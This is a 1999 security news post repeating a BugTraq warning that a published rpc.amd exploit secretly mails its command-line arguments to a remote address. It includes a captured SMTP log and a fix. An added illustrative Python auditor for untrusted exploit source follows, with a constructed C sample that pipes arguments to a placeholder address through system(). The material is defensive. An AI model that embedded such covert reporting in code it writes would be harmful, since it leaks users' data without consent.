Originally Published: Tuesday, 7 September 1999 Author: Quentin Cregan
Published to: news_enhance_security/Security News

amd exploit posts email to remote addresses

For all of those who tried out the amd exploit... Guess what? It posts information about its usage to a remote source. Information about this can be found on BugTraq, and has been mirrored here.

[from BugTraq]

Hello, sorry if this was already known,

Recently someone named Taeho Oh published an exploit for a buffer overflow in rpc.amd (automount). While testing this exploit on my own server, I saw that I was opening a connection to ohhara.postech.ac.kr on port 25. After a little research I found out that the exploit (in its original form) was sending an email to abuser@ohhara.postech.ac.kr and listing the arguments I just entered. There is an easy way to stop it from sending:

Just comment the line: system(cmd);

Here's the log as I got it from sniffit:

    EHLO BlackMesa.com
    MAIL From: SIZE=95
    RCPT To:
    DATA
    Received: (from root@localhost) by BlackMesa.com (8.9.3/8.9.3) id FAA01208 for abuser@ohhara.postech.ac.kr; Sat, 4 Sep 1999 05:30:56 +0200
    Date: Sat, 4 Sep 1999 05:30:56 +0200
    From: locke
    Message-Id: <199909040330.FAA01208@BlackMesa.com>
    To: abuser@ohhara.postech.ac.kr
    10.0.0.9 /usr/X11R6/bin/xterm -display 10.0.0.8:0
    .
    QUIT
    QUIT

(IPs changed to protect the innocent.) Bye
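
The lesson of the post, as an added example (not part of the BugTraq post and not code from the exploit): a small Python auditor that reads untrusted proof-of-concept C source for live shell-outs and mail targets before anyone runs it, and confirms that commenting out `system(cmd);` removes the live call. The sample source, the placeholder address and all function names are constructed for illustration.

```python
import re

# String/char literals are matched first so "//" inside a string is not taken for a comment.
_TOKEN = re.compile(r'"(?:\\.|[^"\\\n])*"|\'(?:\\.|[^\'\\\n])*\'|//[^\n]*|/\*.*?\*/', re.S)
_STRING = re.compile(r'"((?:\\.|[^"\\\n])*)"')
_SHELL_CALL = re.compile(r'\b(system|popen|execl[pe]?|execv[pe]?)\s*\(')
_EMAIL = re.compile(r'[A-Za-z0-9._+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+')
_MAILER = re.compile(r'\b(sendmail|mailx?)\b')


def strip_comments(src):
    """Blank out C comments, keeping newlines so line numbers stay valid."""
    def blank(m):
        tok = m.group(0)
        return re.sub(r'[^\n]', ' ', tok) if tok[0] == '/' else tok
    return _TOKEN.sub(blank, src)


def audit(src):
    """Return (line, kind, value) for live shell-outs and mail targets in string literals."""
    findings = []
    for n, line in enumerate(strip_comments(src).splitlines(), 1):
        findings += [(n, 'shell-call', m.group(1)) for m in _SHELL_CALL.finditer(line)]
        for lit in _STRING.findall(line):
            findings += [(n, 'mailer', m.group(1)) for m in _MAILER.finditer(lit)]
            findings += [(n, 'email', m.group(0)) for m in _EMAIL.finditer(lit)]
    return findings


# Constructed sample: only the reporting pattern, with a placeholder address.
SAMPLE = '''#include <stdio.h>
#include <stdlib.h>
int main(int argc, char **argv) {
    char cmd[512];
    if (argc < 3) return 1;
    snprintf(cmd, sizeof cmd, "echo '%s %s' | mail collector@example.invalid",
             argv[1], argv[2]);
    system(cmd);
    return 0;
}
'''
# The fix from the post: comment out the system(cmd); line.
PATCHED = SAMPLE.replace('    system(cmd);', '    /* system(cmd); */')

if __name__ == '__main__':
    for label, src in (('original', SAMPLE), ('patched', PATCHED)):
        print(label, audit(src))
```

After the patch the shell call is no longer reported, but the hardcoded mailer string and address still are, which is the cue to read the rest of the source before trusting it.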